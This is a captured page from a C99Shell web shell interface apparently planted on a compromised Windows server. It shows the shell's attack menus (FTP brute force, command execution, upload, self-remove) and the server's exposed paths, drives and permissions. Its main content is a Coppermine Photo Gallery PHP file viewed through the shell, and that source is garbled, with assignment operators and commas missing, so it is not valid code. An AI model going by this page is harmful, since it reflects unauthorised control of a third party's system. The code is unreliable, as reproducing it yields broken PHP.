!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\cpg1418\include\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.4%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     keyword.inc.php (2.29 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
  
  ********************************************
  Coppermine version: 1.4.18
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/include/keyword.inc.php $
  $Revision: 4380 $
  $Author: gaugau $
  $Date: 2008-04-12 12:00:19 +0200 (Sa, 12 Apr 2008) $
**********************************************/

if (!defined('IN_COPPERMINE')) { die('Not in Coppermine...');}

// ADDED QUICK KEYWORDS FUNCTIONALITY 8/6/2004

$result cpg_db_query("select keywords FROM {$CONFIG['TABLE_PICTURES']} WHERE keywords <> '' $ALBUM_SET");
if (
mysql_num_rows($result)) {

  
// Grab all keywords
  
print '<br />';
  
starttable("100%"$lang_search_php['keyword_list_title']);


  
// Find unique keywords
  
$keywords_array = array();

  while (list(
$keywords) = mysql_fetch_row($result)) {
      
$array explode(" ",$keywords);

      foreach(
$array as $word)
      {
       if (!
in_array($word utf_strtolower($word),$keywords_array)) $keywords_array[] = $word;
      }
  }

  
// Sort selected keywords
  
sort($keywords_array);
  
$count count($keywords_array);

  
// Result to table
  
echo '<tr><td class="tableb">' ;
  for (
$i 0$i $count$i++) {
    if (
$keywords_array[$i]) {     // Eliminates Null Keywords
    
echo "<a href=\"thumbnails.php?album=search&amp;search=".$keywords_array[$i]."\">$keywords_array[$i]</a>";
    if (
$i<$count-1) {                     // Eliminates Trailing Pipe after last keyword
      
echo " | ";
    }
    }
  }
  echo 
"</td></tr>" ;
  if (
GALLERY_ADMIN_MODE == true){
    
$url basename($_SERVER['PHP_SELF']);
    if (
$url != "keywordmgr.php"){
    echo 
'<tr><td class="tableb" align="center">';
    echo 
'<a href="keywordmgr.php" class="admin_menu">Edit Keywords</a>';
    echo 
"</td></tr>" ;
    }
  } else {
    echo 
'<tr><td class="tableb" align="center">';
    echo 
$lang_search_php['keyword_msg'];
    echo 
"</td></tr>" ;
  }

  
endtable();
}
ob_end_flush();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--